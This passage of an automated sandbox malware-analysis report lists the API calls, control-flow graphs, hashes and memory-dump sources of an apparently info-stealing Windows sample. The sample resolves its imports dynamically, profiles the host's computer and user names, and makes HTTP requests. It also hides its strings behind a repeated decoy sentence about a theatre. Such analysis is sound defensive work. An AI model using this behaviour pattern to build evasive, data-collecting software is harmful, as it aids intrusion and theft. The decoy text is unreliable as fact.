                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                • Instruction ID: 0fec3c8004f8742d7dd9d43a0fb422571a8d4c4f69c04d382e594feaa8c301ce
                                • Opcode Fuzzy Hash: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                • Instruction Fuzzy Hash: 7AA15AB55042419FE348EFAAFD8996E37F9F7C820170C453AE61DA3264D63998C9CB13

                                Control-flow Graph

                                control_flow_graph 764 c345c0-c34695 RtlAllocateHeap 781 c346a0-c346a6 764->781 782 c3474f-c347a9 VirtualProtect 781->782 783 c346ac-c3474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C3460E
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C3479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34617
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 8c45c75d09ec8c4bb52f1431fda7c592df0bfe541867f2cc1736c965bdef59c1
                                • Instruction ID: 9722184ca12c9f16706bdafca3d6b03e64a3b7a920434c24d19247755c52178b
                                • Opcode Fuzzy Hash: 8c45c75d09ec8c4bb52f1431fda7c592df0bfe541867f2cc1736c965bdef59c1
                                • Instruction Fuzzy Hash: 3A414D277C168CFACE28F7B4A85ED9D7B515F42702F505060FD0262280DFB87BA45D19

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                • HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C363FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C3646D
                                • InternetCloseHandle.WININET(00000000), ref: 00C364EF
                                • InternetCloseHandle.WININET(00000000), ref: 00C364F9
                                • InternetCloseHandle.WININET(00000000), ref: 00C36503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                • Instruction ID: 04078953bf938df15bcc01f89e04dc2b4793425046c7aa88e5fee91e870fd282
                                • Opcode Fuzzy Hash: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                • Instruction Fuzzy Hash: 01717071A50218AFEB24DFA1CC49BEE7778FB44700F1081A8F5096B1D0DBB46A89DF51

                                Control-flow Graph

                                control_flow_graph 1275 c478e0-c47937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 c47942-c47945 1275->1276 1277 c47939-c4793e 1275->1277 1278 c47962-c47972 1276->1278 1277->1278
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                • Instruction ID: 035164f214b34f763c814380577159b0e81387c7b31a79c211f50a29fc37ad4d
                                • Opcode Fuzzy Hash: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                • Instruction Fuzzy Hash: E101A9B1A04204EFD704DF95DD49BAEBBB8F744B11F104269F955F3380D37459448BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                • Instruction ID: 9ce8ac900d02d2978bb934eb55fb7ecf49834642ff18445beec39de60eefcc94
                                • Opcode Fuzzy Hash: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                • Instruction Fuzzy Hash: 9AF04FB1944208AFD714DF99DD4AFAEBBB8FB44711F10026AFA05A2680C77415448BA2
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                • Instruction ID: fa1f65954886638f3372c828b1a3f412262ef9978e05604369d9d6423aecacd3
                                • Opcode Fuzzy Hash: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                • Instruction Fuzzy Hash: BCD05E7490030CDFCB04DFE1D8496EDBB78FB48312F040565DD0972340EA3054C6CAA6

                                 Control-flow Graph
                                 (text export of the graph image; the executed / not-executed block colouring is not recoverable from the text. Each entry is: node, address range, API calls in the block, successor nodes)

                                 • 633 c49c10-c49c1a → 634, 635
                                 • 635 c49c20-c4a031 GetProcAddress * 43 → 634
                                 • 634 c4a036-c4a0ca LoadLibraryA * 8 → 636, 637
                                 • 637 c4a0cc-c4a141 GetProcAddress * 5 → 636
                                 • 636 c4a146-c4a14d → 638, 639
                                 • 639 c4a153-c4a211 GetProcAddress * 8 → 638
                                 • 638 c4a216-c4a21d → 640, 641
                                 • 640 c4a21f-c4a293 GetProcAddress * 5 → 641
                                 • 641 c4a298-c4a29f → 642, 643
                                 • 642 c4a2a5-c4a332 GetProcAddress * 6 → 643
                                 • 643 c4a337-c4a33e → 644, 645
                                 • 644 c4a344-c4a41a GetProcAddress * 9 → 645
                                 • 645 c4a41f-c4a426 → 646, 647
                                 • 647 c4a428-c4a49d GetProcAddress * 5 → 646
                                 • 646 c4a4a2-c4a4a9 → 648, 649
                                 • 649 c4a4ab-c4a4d7 GetProcAddress * 2 → 648
                                 • 648 c4a4dc-c4a4e3 → 650, 651
                                 • 651 c4a4e5-c4a510 GetProcAddress * 2 → 650
                                 • 650 c4a515-c4a51c → 652, 653
                                 • 653 c4a522-c4a60d GetProcAddress * 10 → 652
                                 • 652 c4a612-c4a619 → 654, 655
                                 • 655 c4a61b-c4a678 GetProcAddress * 4 → 654
                                 • 654 c4a67d-c4a684 → 656, 657
                                 • 656 c4a686-c4a699 GetProcAddress → 657
                                 • 657 c4a69e-c4a6a5 → 658, 659
                                 • 658 c4a6a7-c4a703 GetProcAddress * 4 → 659
                                 • 659 c4a708-c4a709
                                APIs
                                • GetProcAddress.KERNEL32(77190000,019E5308), ref: 00C49C2D
                                • GetProcAddress.KERNEL32(77190000,019E5268), ref: 00C49C45
                                • GetProcAddress.KERNEL32(77190000,019F9020), ref: 00C49C5E
                                • GetProcAddress.KERNEL32(77190000,019F9038), ref: 00C49C76
                                • GetProcAddress.KERNEL32(77190000,019F9050), ref: 00C49C8E
                                • GetProcAddress.KERNEL32(77190000,019FD0E0), ref: 00C49CA7
                                • GetProcAddress.KERNEL32(77190000,019EA848), ref: 00C49CBF
                                • GetProcAddress.KERNEL32(77190000,019FD0F8), ref: 00C49CD7
                                • GetProcAddress.KERNEL32(77190000,019FD248), ref: 00C49CF0
                                • GetProcAddress.KERNEL32(77190000,019FD068), ref: 00C49D08
                                • GetProcAddress.KERNEL32(77190000,019FD188), ref: 00C49D20
                                • GetProcAddress.KERNEL32(77190000,019E5328), ref: 00C49D39
                                • GetProcAddress.KERNEL32(77190000,019E51E8), ref: 00C49D51
                                • GetProcAddress.KERNEL32(77190000,019E5028), ref: 00C49D69
                                • GetProcAddress.KERNEL32(77190000,019E5348), ref: 00C49D82
                                • GetProcAddress.KERNEL32(77190000,019FD260), ref: 00C49D9A
                                • GetProcAddress.KERNEL32(77190000,019FD2A8), ref: 00C49DB2
                                • GetProcAddress.KERNEL32(77190000,019EA758), ref: 00C49DCB
                                • GetProcAddress.KERNEL32(77190000,019E4F88), ref: 00C49DE3
                                • GetProcAddress.KERNEL32(77190000,019FD098), ref: 00C49DFB
                                • GetProcAddress.KERNEL32(77190000,019FD2D8), ref: 00C49E14
                                • GetProcAddress.KERNEL32(77190000,019FD050), ref: 00C49E2C
                                • GetProcAddress.KERNEL32(77190000,019FD2C0), ref: 00C49E44
                                • GetProcAddress.KERNEL32(77190000,019E50A8), ref: 00C49E5D
                                • GetProcAddress.KERNEL32(77190000,019FD0B0), ref: 00C49E75
                                • GetProcAddress.KERNEL32(77190000,019FD308), ref: 00C49E8D
                                • GetProcAddress.KERNEL32(77190000,019FD110), ref: 00C49EA6
                                • GetProcAddress.KERNEL32(77190000,019FD038), ref: 00C49EBE
                                • GetProcAddress.KERNEL32(77190000,019FD320), ref: 00C49ED6
                                • GetProcAddress.KERNEL32(77190000,019FD170), ref: 00C49EEF
                                • GetProcAddress.KERNEL32(77190000,019FD1A0), ref: 00C49F07
                                • GetProcAddress.KERNEL32(77190000,019FD080), ref: 00C49F1F
                                • GetProcAddress.KERNEL32(77190000,019FD2F0), ref: 00C49F38
                                • GetProcAddress.KERNEL32(77190000,019EFA78), ref: 00C49F50
                                • GetProcAddress.KERNEL32(77190000,019FD0C8), ref: 00C49F68
                                • GetProcAddress.KERNEL32(77190000,019FD128), ref: 00C49F81
                                • GetProcAddress.KERNEL32(77190000,019E50C8), ref: 00C49F99
                                • GetProcAddress.KERNEL32(77190000,019FD140), ref: 00C49FB1
                                • GetProcAddress.KERNEL32(77190000,019E5148), ref: 00C49FCA
                                • GetProcAddress.KERNEL32(77190000,019FD158), ref: 00C49FE2
                                • GetProcAddress.KERNEL32(77190000,019FD1B8), ref: 00C49FFA
                                • GetProcAddress.KERNEL32(77190000,019E5188), ref: 00C4A013
                                • GetProcAddress.KERNEL32(77190000,019E51A8), ref: 00C4A02B
                                • LoadLibraryA.KERNEL32(019FD1D0,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D
                                • LoadLibraryA.KERNEL32(019FD278,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A04E
                                • LoadLibraryA.KERNEL32(019FD1E8,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A060
                                • LoadLibraryA.KERNEL32(019FD200,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A072
                                • LoadLibraryA.KERNEL32(019FD290,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A083
                                • LoadLibraryA.KERNEL32(019FD218,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A095
                                • LoadLibraryA.KERNEL32(019FD230,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0A7
                                • LoadLibraryA.KERNEL32(019FD608,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0B8
                                • GetProcAddress.KERNEL32(77040000,019E51C8), ref: 00C4A0DA
                                • GetProcAddress.KERNEL32(77040000,019FD590), ref: 00C4A0F2
                                • GetProcAddress.KERNEL32(77040000,019F8B28), ref: 00C4A10A
